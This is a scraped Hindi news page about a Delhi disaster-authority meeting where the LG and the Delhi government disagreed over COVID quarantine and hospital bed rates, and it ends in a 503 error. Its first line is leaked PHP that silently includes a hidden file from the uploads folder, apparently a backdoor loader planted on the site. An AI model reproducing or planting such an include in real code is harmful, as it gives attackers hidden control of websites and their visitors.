add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); क्वारनटीन पर नहीं बनी एलजी-दिल्ली सरकार में सहमति, शाम 5 बजे फिर DDMA की मीटिंग – SOCH INDIA
Menu

देश
क्वारनटीन पर नहीं बनी एलजी-दिल्ली सरकार में सहमति, शाम 5 बजे फिर DDMA की मीटिंग

nobanner

दिल्ली स्टेट डिज़ास्टर मैनेजमेंट अथॉरिटी की मीटिंग खत्म हो गई है. स्टेट डिज़ास्टर मैनेजमेंट अथॉरिटी की मीटिंग में निजी अस्पतालों के बेड के दर और होम आइसोलेशन खत्म करने के LG अनिल बैजल के आदेश पर सहमति नहीं बनी है. अब स्टेट डिज़ास्टर मैनेजमेंट अथॉरिटी बैठक शाम को 5 बजे दोबारा होगी.

दिल्ली के डिप्टी सीएम मनीष सिसोदिया ने कहा कि केंद्र सरकार ने प्राइवेट अस्पतालों में केवल 24% बेड को सस्ता करने की सिफारिश की है जबकि दिल्ली सरकार कम से कम 60% बेड को सस्ता करने पर अड़ी है. यहीं बात अटक गई है. शाम को फिर इस पर चर्चा होगी.

सिसोदिया ने कहा कि होम आइसोलेशन खत्म करने के संबंध में भी एलजी अनिल बैजल के कल के फैसले का दिल्ली सरकार ने विरोध किया. इस पर भी कोई निर्णय नहीं हुआ. शाम को फिर चर्चा होगी.

सीएम केजरीवाल ने भी उठाए सवाल

इससे पहले दिल्ली डिजास्टर मैनेजमेंट अथॉरिटी की बैठक में दिल्ली के मुख्यमंत्री अरविंद केजरीवाल ने एलजी अनिल बैजल के क्वारनटीन पर दिए गए आदेश का पुरजोर विरोध किया है.

उपराज्यपाल अनिल बैजल ने आदेश दिया है कि अब दिल्ली में कोई भी कोरोना पॉजिटिव होगा तो उसको कम से कम 5 दिन क्वारनटीन सेंटर में जाना अनिवार्य होगा.

अरविंद केजरीवाल ने कहा कि पूरे देश से हटकर दिल्ली के लिए अलग नियम क्यों बनाए गए हैं. सूत्रों के मुताबिक केजरीवाल ने इन बिंदुओं पर एलजी के आदेश का विरोध किया.

1. जब आईसीएमआर पूरे देश में बिना लक्षण और हल्के लक्षण वाले कोरोना मरीजों को होम आइसोलेशन की इजाज़त देता है तो दिल्ली में अलग नियम क्यों?

2. ज्यादातर कोरोना पॉजिटिव मरीज हल्के लक्षण/बिना लक्षण वाले ही होते हैं इनको क्वारनटीन करने के लिए व्यवस्था कहां से करेंगे?

3. रेलवे ने आइसोलेशन कोच दिए हैं लेकिन उसके अंदर इतनी गर्मी में कोई कैसे रहेगा?

4. हमारी प्राथमिकता गंभीर मरीजों के लिए होनी चाहिए या बिना लक्षण और हल्के लक्षण वालों के लिए?

5. मेडिकल स्टाफ की पहले ही कमी है, अब हज़ारों मरीजों के लिए क्वारनटीन सेंटर पर डॉक्टर नर्स कहां से आएंगे?

6. क्वारनटीन होने के डर से अब हल्के लक्षण और बिना लक्षण वाले लोग टेस्ट कराने से बचेंगे, इससे संक्रमण और फैलेगा.

7. इससे दिल्ली में अफरातफरी हो जाएगी और पूरी व्यवस्था बिगड़ जाएगी.

8. पूरी दुनिया में ऐसा कहीं नहीं किया गया कि बिना लक्षण वाले मरीज़ों को कोई सरकार क्वारनटीन सेंटर में लेकर आए.

बता दें दिल्ली में अभी कोरोना के कुल मरीजों की संख्या 53116 है. यहां एक्टिव केस की संख्या 27512 है, जबकि 23569 लोग ठीक हो चुके हैं. अब तक यहां कोरोना से 2035 लोगों की मौत हो चुकी है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.